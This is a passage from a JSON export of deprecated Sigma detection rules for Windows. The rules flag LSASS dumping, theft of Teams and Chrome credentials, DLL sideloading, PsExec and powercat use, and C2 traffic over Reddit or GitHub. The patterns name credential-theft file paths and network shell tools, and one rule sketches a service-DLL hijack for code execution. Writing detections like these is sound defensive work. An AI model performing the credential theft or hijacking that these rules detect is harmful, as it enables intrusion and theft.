    "content": "title: Vulnerable Lenovo Driver Load\nid: ac683a42-877b-4ff8-91ac-69e94b0f70b4\nstatus: deprecated\ndescription: Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges\nreferences:\n    - https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities\n    - https://github.com/alfarom256/CVE-2022-3699/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/11/10\nmodified: 2023/09/12\ntags:\n    - attack.privilege_escalation\n    - cve.2021.21551\n    - attack.t1543\nlogsource:\n    category: driver_load\n    product: windows\ndetection:\n    selection:\n        Hashes|contains:\n            - 'SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE'\n            - 'SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F'\n            - 'MD5=B941C8364308990EE4CC6EADF7214E0F'\n    condition: selection\nfalsepositives:\n    - Legitimate driver loads (old driver that didn't receive an update)\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/file_event_win_access_susp_teams.yml",
    "content": "title: Suspicious File Event With Teams Objects\nid: 6902955a-01b7-432c-b32a-6f5f81d8f624\nstatus: deprecated\ndescription: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/\n    - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens\nauthor: '@SerkinValery'\ndate: 2022/09/16\nmodified: 2024/07/22\ntags:\n    - attack.credential_access\n    - attack.t1528\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains:\n            - '\\Microsoft\\Teams\\Cookies'\n            - '\\Microsoft\\Teams\\Local Storage\\leveldb'\n    filter:\n        Image|contains: '\\Microsoft\\Teams\\current\\Teams.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/file_event_win_access_susp_unattend_xml.yml",
    "content": "title: Suspicious Unattend.xml File Access\nid: 1a3d42dd-3763-46b9-8025-b5f17f340dfb\nstatus: deprecated\ndescription: |\n    Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\n    If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md\nauthor: frack113\ndate: 2021/12/19\nmodified: 2024/07/22\ntags:\n    - attack.credential_access\n    - attack.t1552.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '\\unattend.xml'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/file_event_win_crackmapexec_patterns.yml",
    "content": "title: CrackMapExec File Creation Patterns\nid: 9433ff9c-5d3f-4269-99f8-95fc826ea489\nstatus: deprecated\ndescription: Detects suspicious file creation patterns found in logs when CrackMapExec is used\nreferences:\n    - https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/03/12\nmodified: 2024/03/01\ntags:\n    - attack.credential_access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_lsass_dump1:\n        TargetFilename|startswith: 'C:\\Windows\\Temp\\'\n        Image: 'C:\\WINDOWS\\system32\\rundll32.exe'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n        TargetFilename|endswith:\n            - '.rtf'\n            - '.otf'\n            - '.odt'\n            - '.txt'\n            - '.doc'\n            - '.pdf'\n            - '.dll'\n            - '.docx'\n            - '.wpd'\n            - '.icns'\n            - '.db'\n            - '.ini'\n            - '.tex'\n            - '.sys'\n            - '.csv'\n            - '.fon'\n            - '.tar'\n            - '.ttf'\n            - '.xml'\n            - '.cfg'\n            - '.cpl'\n            - '.jpg'\n            - '.drv'\n            - '.cur'\n            - '.tmp'\n            # list is incomplete\n    selection_procdump:\n        TargetFilename: 'C:\\Windows\\Temp\\procdump.exe'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/file_event_win_hktl_createminidump.yml",
    "content": "title: CreateMiniDump Hacktool\nid: db2110f3-479d-42a6-94fb-d35bc1e46492\nstatus: deprecated\nrelated:\n    - id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d\n      type: derived\ndescription: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine\nauthor: Florian Roth (Nextron Systems)\nreferences:\n    - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass\ndate: 2019/12/22\nmodified: 2022/05/14\ntags:\n    - attack.credential_access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '\\lsass.dmp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "deprecated/windows/file_event_win_lsass_memory_dump_file_creation.yml",
    "content": "title: LSASS Memory Dump File Creation\nid: 5e3d3601-0662-4af0-b1d2-36a05e90c40a\nstatus: deprecated\ndescription: LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019/10/22\nmodified: 2023/08/29\ntags:\n    - attack.credential_access\n    - attack.t1003.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: 'lsass'\n        TargetFilename|endswith: 'dmp'\n    condition: selection\nfields:\n    - ComputerName\n    - TargetFilename\nfalsepositives:\n    - Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator\n    - Dumps of another process that contains lsass in its process name (substring)\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/file_event_win_mimikatz_memssp_log_file.yml",
    "content": "title: Mimikatz MemSSP Default Log File Creation\nid: 034affe8-6170-11ec-844f-0f78aa0c4d66\nrelated:\n    - id: 9e099d99-44c2-42b6-a6d8-54c3545cab29 # Replacement for this rule\n      type: similar\nstatus: deprecated\ndescription: Detects Mimikatz MemSSP default log file creation\nreferences:\n    - https://pentestlab.blog/2019/10/21/persistence-security-support-provider/\nauthor: David ANDRE\ndate: 2021/12/20\nmodified: 2023/02/16\ntags:\n    - attack.credential_access\n    - attack.t1003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: 'mimilsa.log'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/file_event_win_office_outlook_rdp_file_creation.yml",
    "content": "title: .RDP File Created by Outlook Process\nid: f748c45a-f8d3-4e6f-b617-fe176f695b8f\nrelated:\n    - id: fccfb43e-09a7-4bd2-8b37-a5a7df33386d\n      type: derived\nstatus: deprecated\ndescription: |\n    Detects the creation of files with the \".rdp\" extensions in the temporary directory that Outlook uses when opening attachments.\n    This can be used to detect spear-phishing campaigns that use RDP files as attachments.\nreferences:\n    - https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/\n    - https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/\n    - https://www.linkedin.com/feed/update/urn:li:ugcPost:7257437202706493443?commentUrn=urn%3Ali%3Acomment%3A%28ugcPost%3A7257437202706493443%2C7257522819985543168%29&dashCommentUrn=urn%3Ali%3Afsd_comment%3A%287257522819985543168%2Curn%3Ali%3AugcPost%3A7257437202706493443%29\nauthor: Florian Roth\ndate: 2024-11-01\nmodified: 2025-07-22\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_extension:\n        TargetFilename|endswith: '.rdp'\n    selection_location:\n        - TargetFilename|contains:\n              - '\\AppData\\Local\\Packages\\Microsoft.Outlook_' # New Outlook\n              - '\\AppData\\Local\\Microsoft\\Olk\\Attachments\\' # New Outlook\n        - TargetFilename|contains|all:\n              - '\\AppData\\Local\\Microsoft\\Windows\\'\n              - '\\Content.Outlook\\'\n    condition: all of selection_*\nfalsepositives:\n    - Whenever someone receives an RDP file as an email attachment and decides to save or open it right from the attachments\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/file_event_win_susp_clr_logs.yml",
    "content": "title: Suspicious CLR Logs Creation\nid: e4b63079-6198-405c-abd7-3fe8b0ce3263\nstatus: deprecated\ndescription: Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.\nreferences:\n    - https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html\n    - https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/\n    - https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml\nauthor: omkar72, oscd.community, Wojciech Lesicki\ndate: 2020/10/12\nmodified: 2023/01/05\ntags:\n    - attack.execution\n    - attack.defense_evasion\n    - attack.t1059.001\n    - attack.t1218\nlogsource:\n    category: file_event\n    product: windows\n    definition: Check your sysmon configuration for monitoring UsageLogs folder. In SwiftOnSecurity configuration we have that thanks @SBousseaden\ndetection:\n    selection:\n        TargetFilename|contains|all:\n            - '\\AppData\\Local\\Microsoft\\CLR'\n            - '\\UsageLogs\\'\n        TargetFilename|contains:\n            - 'mshta'\n            - 'cscript'\n            - 'wscript'\n            - 'regsvr32'\n            - 'wmic'\n            - 'rundll32'\n            - 'svchost'\n    condition: selection\nfalsepositives:\n    - Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/image_load_alternate_powershell_hosts_moduleload.yml",
    "content": "title: Alternate PowerShell Hosts - Image\nid: fe6e002f-f244-4278-9263-20e4b593827f\nstatus: deprecated\ndescription: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2019/09/12\nmodified: 2023/06/01\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Description: 'System.Management.Automation'\n        ImageLoaded|contains: 'System.Management.Automation'\n    filter_generic:\n        - Image|endswith:\n            - '\\powershell.exe'\n            - '\\mscorsvw.exe'\n        - Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft Visual Studio\\'\n            - 'C:\\Program Files\\Microsoft Visual Studio\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Program Files\\Citrix\\ConfigSync\\'\n        - Image: 'C:\\Program Files\\PowerShell\\7\\pwsh.exe'\n    filter_aurora:\n        # This filter is to avoid a race condition FP with this specific ETW provider in aurora\n        Image: null\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/image_load_office_dsparse_dll_load.yml",
    "content": "title: Active Directory Parsing DLL Loaded Via Office Application\nid: a2a3b925-7bb0-433b-b508-db9003263cc4\nstatus: deprecated # In the AD Environment, dsparse.dll is loaded everytime an Office application is launched, so this rule is not useful.\ndescription: Detects DSParse DLL being loaded by an Office Product\nreferences:\n    - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\nauthor: Antonlovesdnb\ndate: 2020-02-19\nmodified: 2025-10-17\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\mspub.exe'\n            - '\\onenote.exe'\n            - '\\onenoteim.exe' # Just in case\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n        ImageLoaded|contains: '\\dsparse.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/image_load_office_kerberos_dll_load.yml",
    "content": "title: Active Directory Kerberos DLL Loaded Via Office Application\nid: 7417e29e-c2e7-4cf6-a2e8-767228c64837\nstatus: deprecated # In the AD Environment, kerberos.dll is loaded everytime an Office application is launched, so this rule is not useful.\ndescription: Detects Kerberos DLL being loaded by an Office Product\nreferences:\n    - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\nauthor: Antonlovesdnb\ndate: 2020-02-19\nmodified: 2025-10-22\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\mspub.exe'\n            - '\\onenote.exe'\n            - '\\onenoteim.exe' # Just in case\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n        ImageLoaded|endswith: '\\kerberos.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/image_load_side_load_advapi32.yml",
    "content": "title: Suspicious Load of Advapi31.dll\nid: d813d662-785b-42ca-8b4a-f7457d78d5a9\nstatus: deprecated\ndescription: Detects the load of advapi31.dll by a process running in an uncommon folder\nreferences:\n    - https://github.com/hlldz/Phant0m\nauthor: frack113\ndate: 2022/02/03\nmodified: 2023/03/15\ntags:\n    - attack.defense_evasion\n    - attack.t1070\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        ImageLoaded|endswith: '\\advapi32.dll'\n    filter_common:\n        Image|startswith:\n            - 'C:\\Windows\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n    filter_defender:\n        Image|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\platform\\'\n        Image|endswith: '\\MpCmdRun.exe'\n    filter_onedrive:\n        Image|startswith: 'C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\Microsoft\\OneDrive\\'\n        Image|endswith: 'FileCoAuth.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: informational\n"
  },
  {
    "path": "deprecated/windows/image_load_side_load_scm.yml",
    "content": "title: SCM DLL Sideload\nid: bc3cc333-48b9-467a-9d1f-d44ee594ef48\nrelated:\n    - id: 602a1f13-c640-4d73-b053-be9a2fa58b77\n      type: similar\nstatus: deprecated\ndescription: Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nreferences:\n    - https://decoded.avast.io/martinchlumecky/png-steganography/\n    - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022/12/01\nmodified: 2023/02/14\ntags:\n    - attack.defense_evasion\n    - attack.persistence\n    - attack.privilege_escalation\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded:\n            - 'C:\\Windows\\System32\\WLBSCTRL.dll'\n            - 'C:\\Windows\\System32\\TSMSISrv.dll'\n            - 'C:\\Windows\\System32\\TSVIPSrv.dll'\n        Image: 'C:\\Windows\\System32\\svchost.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/image_load_side_load_svchost_dlls.yml",
    "content": "title: Svchost DLL Search Order Hijack\nid: 602a1f13-c640-4d73-b053-be9a2fa58b77\nstatus: deprecated\ndescription: |\n    Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\n    IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\n    An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\nreferences:\n    - https://decoded.avast.io/martinchlumecky/png-steganography/\n    - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\nauthor: SBousseaden\ndate: 2019/10/28\nmodified: 2024/01/10\ntags:\n    - attack.persistence\n    - attack.defense_evasion\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n        ImageLoaded|endswith:\n            - '\\tsmsisrv.dll'\n            - '\\tsvipsrv.dll'\n            - '\\wlbsctrl.dll'\n    filter:\n        ImageLoaded|startswith: 'C:\\Windows\\WinSxS\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/image_load_susp_uncommon_image_load.yml",
    "content": "title: Possible Process Hollowing Image Loading\nid: e32ce4f5-46c6-4c47-ba69-5de3c9193cd7\nstatus: deprecated # Needs to be a correlation rule\ndescription: Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz\nreferences:\n    - https://web.archive.org/web/20220815065318/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html\nauthor: Markus Neis\ndate: 2018/01/07\nmodified: 2024/01/22\ntags:\n    - attack.defense_evasion\n    - attack.t1574.001\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\notepad.exe'\n        ImageLoaded|endswith:\n            - '\\samlib.dll'\n            - '\\WinSCard.dll'\n    condition: selection\nfalsepositives:\n    - Very likely, needs more tuning\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/image_load_susp_winword_wmidll_load.yml",
    "content": "title: Windows Management Instrumentation DLL Loaded Via Microsoft Word\nid: a457f232-7df9-491d-898f-b5aabd2cbe2f\nstatus: deprecated\ndescription: Detects DLL's Loaded Via Word Containing VBA Macros Executing WMI Commands\nreferences:\n    - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\n    - https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/\n    - https://media.cert.europa.eu/static/SecurityAdvisories/2019/CERT-EU-SA2019-021.pdf\nauthor: Michael R. (@nahamike01)\ndate: 2019/12/26\nmodified: 2022/05/14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\winword.exe'\n            - '\\powerpnt.exe'\n            - '\\excel.exe'\n            - '\\outlook.exe'\n        ImageLoaded|endswith:\n            - '\\wmiutils.dll'\n            - '\\wbemcomn.dll'\n            - '\\wbemprox.dll'\n            - '\\wbemdisp.dll'\n            # - '\\wbemsvc.dll'  # too many FPs, tested with Win11 and O365\n    condition: selection\nfalsepositives:\n    - Possible. Requires further testing.\nlevel: informational\n"
  },
  {
    "path": "deprecated/windows/net_connection_win_binary_github_com.yml",
    "content": "title: Microsoft Binary Github Communication\nid: 635dbb88-67b3-4b41-9ea5-a3af2dd88153\nstatus: deprecated\ndescription: Detects an executable in the Windows folder accessing github.com\nreferences:\n    - https://twitter.com/M_haggis/status/900741347035889665\n    - https://twitter.com/M_haggis/status/1032799638213066752\n    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1\nauthor: Michael Haag (idea), Florian Roth (Nextron Systems)\ndate: 2017/08/24\nmodified: 2023/04/18\ntags:\n    - attack.command_and_control\n    - attack.t1105\n    - attack.exfiltration\n    - attack.t1567.001\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith:\n            - '.github.com'\n            - '.githubusercontent.com'\n        Image|startswith: 'C:\\Windows\\'\n    condition: selection\nfalsepositives:\n    - Unknown\n    - '@subTee in your network'\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/net_connection_win_reddit_api_non_browser_access.yml",
    "content": "title: Suspicious Non-Browser Network Communication With Reddit API\nid: d7b09985-95a3-44be-8450-b6eadf49833e\nstatus: deprecated # In favour of 297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7\ndescription: Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2\nreferences:\n    - https://github.com/kleiton0x00/RedditC2\n    - https://twitter.com/kleiton0x7e/status/1600567316810551296\n    - https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al\nauthor: Gavin Knapp\ndate: 2023/02/16\nmodified: 2024/02/02\ntags:\n    - attack.command_and_control\n    - attack.t1102\nlogsource:\n    product: windows\n    category: network_connection\ndetection:\n    selection:\n        DestinationHostname|contains: 'reddit.com' # Match with Reddit API when you can\n    # Other browsers or apps known to use reddit should be added\n    # TODO: Add full paths for default install locations\n    filter_optional_brave:\n        Image|endswith: '\\brave.exe'\n    filter_optional_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_optional_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_optional_maxthon:\n        Image|endswith: '\\maxthon.exe'\n    filter_optional_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_optional_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_optional_opera:\n        Image|endswith: '\\opera.exe'\n    filter_optional_safari:\n        Image|endswith: '\\safari.exe'\n    filter_optional_seamonkey:\n        Image|endswith: '\\seamonkey.exe'\n    filter_optional_vivaldi:\n        Image|endswith: '\\vivaldi.exe'\n    filter_optional_whale:\n        Image|endswith: '\\whale.exe'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate applications communicating with the Reddit API e.g. web browsers not in the exclusion list, app with an RSS  etc.\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/net_connection_win_susp_epmap.yml",
    "content": "title: Suspicious Epmap Connection\nid: 628d7a0b-7b84-4466-8552-e6138bc03b43\nstatus: deprecated\ndescription: Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)\nreferences:\n    - https://github.com/RiccardoAncarani/TaskShell/\nauthor: frack113, Tim Shelton (fps)\ndate: 2022/07/14\nmodified: 2024/03/01\ntags:\n    - attack.lateral_movement\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Protocol: tcp\n        Initiated: 'true'\n        DestinationPort: 135\n        # DestinationPortName: epmap\n    filter_image:\n        Image|startswith:\n            - C:\\Windows\\\n            - C:\\ProgramData\\Amazon\\SSM\\Update\\amazon-ssm-agent-updater\n    filter_image_null1:\n        Image: null\n    filter_image_null2:\n        Image: ''\n    filter_image_unknown:\n        Image: '<unknown process>'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/pipe_created_psexec_pipes_artifacts.yml",
    "content": "title: PsExec Pipes Artifacts\nid: 9e77ed63-2ecf-4c7b-b09d-640834882028\nstatus: deprecated\ndescription: Detecting use PsExec via Pipe Creation/Access to pipes\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\nauthor: Nikita Nazarov, oscd.community\ndate: 2020/05/10\nmodified: 2023/08/07\ntags:\n    - attack.lateral_movement\n    - attack.t1021.002\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|startswith:\n            - 'psexec'\n            - 'paexec'\n            - 'remcom'\n            - 'csexec'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator activity\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/posh_pm_powercat.yml",
    "content": "title: Netcat The Powershell Version - PowerShell Module\nid: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2\nstatus: deprecated\ndescription: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network\nreferences:\n    - https://nmap.org/ncat/\n    - https://github.com/besimorhino/powercat\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md\nauthor: frack113\ndate: 2021/07/21\nmodified: 2023/01/20\ntags:\n    - attack.command_and_control\n    - attack.t1095\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 'Requirements: PowerShell Module Logging must be enabled'\ndetection:\n    selection:\n        ContextInfo|contains:\n            - 'powercat '\n            - 'powercat.ps1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/posh_ps_access_to_chrome_login_data.yml",
    "content": "title: Accessing Encrypted Credentials from Google Chrome Login Database\nid: 98f4c75c-3089-44f3-b733-b327b9cd9c9d\nstatus: deprecated\nauthor: frack113\ndate: 2021/12/20\nmodified: 2022/05/14\ndescription: |\n  Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\n  Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\n  Web browsers typically store the credentials in an encrypted format within a credential store.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md\nlogsource:\n    product: windows\n    category: ps_script\n    definition: Script block logging must be enabled\ndetection:\n    selection_cmd:\n        ScriptBlockText|contains|all:\n            - Copy-Item\n            - '-Destination'\n    selection_path:\n        ScriptBlockText|contains:\n            - '\\Google\\Chrome\\User Data\\Default\\Login Data'\n            - '\\Google\\Chrome\\User Data\\Default\\Login Data For Account'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\ntags:\n    - attack.credential_access\n    - attack.t1555.003\n"
  },
  {
    "path": "deprecated/windows/posh_ps_azurehound_commands.yml",
    "content": "title: AzureHound PowerShell Commands\nid: 83083ac6-1816-4e76-97d7-59af9a9ae46e\nstatus: deprecated\ndescription: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound\nreferences:\n    - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1\n    - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html\nauthor: Austin Songer (@austinsonger)\ndate: 2021/10/23\nmodified: 2023/01/02\ntags:\n    - attack.discovery\n    - attack.t1482\n    - attack.t1087\n    - attack.t1087.001\n    - attack.t1087.002\n    - attack.t1069.001\n    - attack.t1069.002\n    - attack.t1069\nlogsource:\n    product: windows\n    category: ps_script\n    definition: Script Block Logging must be enabled\ndetection:\n    selection:\n        ScriptBlockText|contains: Invoke-AzureHound\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/posh_ps_cl_invocation_lolscript.yml",
    "content": "title: Execution via CL_Invocation.ps1 - Powershell\nid: 4cd29327-685a-460e-9dac-c3ab96e549dc\nstatus: deprecated\ndescription: Detects Execution via SyncInvoke in CL_Invocation.ps1 module\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/\n    - https://twitter.com/bohops/status/948061991012327424\nauthor: oscd.community, Natalia Shornikova\ndate: 2020/10/14\nmodified: 2023/08/17\ntags:\n    - attack.defense_evasion\n    - attack.t1216\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'CL_Invocation.ps1'\n            - 'SyncInvoke'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/posh_ps_cl_mutexverifiers_lolscript.yml",
